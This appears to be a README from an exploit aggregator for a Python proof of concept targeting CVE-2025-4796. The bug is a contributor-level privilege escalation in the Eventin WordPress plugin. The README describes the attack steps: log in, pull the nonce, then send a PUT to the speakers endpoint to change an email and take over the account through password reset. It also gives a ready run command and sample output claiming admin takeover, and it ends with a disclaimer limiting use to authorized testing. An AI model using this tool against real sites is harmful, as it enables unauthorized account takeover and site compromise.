## https://sploitus.com/exploit?id=76E61648-C58A-56AE-8B14-C9341620E8B4
# CVE-2025-4796
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover
# ๐ก๏ธ Eventin
Once the email is changed to an attacker-controlled address, the standard WordPress password reset flow can be used to take over the account.
## ๐งฐ Script (PoC)
Filename: `CVE-2025-4796.py`
This script automates the steps:
1. Log in to the target WordPress site using supplied credentials.
2. Extract the required X-WP-Nonce
3. Send a PUT request to `/wp-json/eventin/v2/speakers/` to update the speaker's email.
4. Print and format the JSON response and a professional success message.
Requirements:
- Python 3.8+
- requests
Installation:
```sh
pip install requests
```
## ๐ Usage
Run the script from the command line:
```sh
python CVE-2025-4796.py -u https://target.site -id 9 -email attacker@example.com -user contributor_user -pass contributor_password
```
Show script help:
```sh
python CVE-2025-4796.py -h
```
## ๐ CLI Options (help)
usage: t.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
(Notes: all help text and runtime output are English and formatted professionally.)
## โ Example Successful Output
```
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : Nxploited@gmail.com
[!] Please reset your password using the email: Nxploited@gmail.com
```
## โ๏ธ Responsible Disclosure & Disclaimer
- This repository is provided for security research, testing, and defensive purposes.
- Do not use these techniques against systems you do not own or do not have explicit authorization to test.
- Unauthorized exploitation of vulnerabilities is illegal and unethical.
- If you are a site owner and believe you are vulnerable, update Eventin to the latest version or apply vendor patches immediately.
- Use this code only in authorized environments (lab, client-approved pen test, or with explicit permission).
## ๐งพ What the script does (concise)
- Validates inputs (URL, email) and normalizes URL schema.
- Disables SSL warnings (optional; used to support testing against self-signed dev instances).
- Logs in using provided WP credentials and validates login via cookies.
- Fetches X-WP-Nonce from the admin page.
- Sends an authenticated PUT request to update the speaker's email.
- Prints the formatted JSON response and a final human-readable success summary.
## ๐ค Credits
By: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/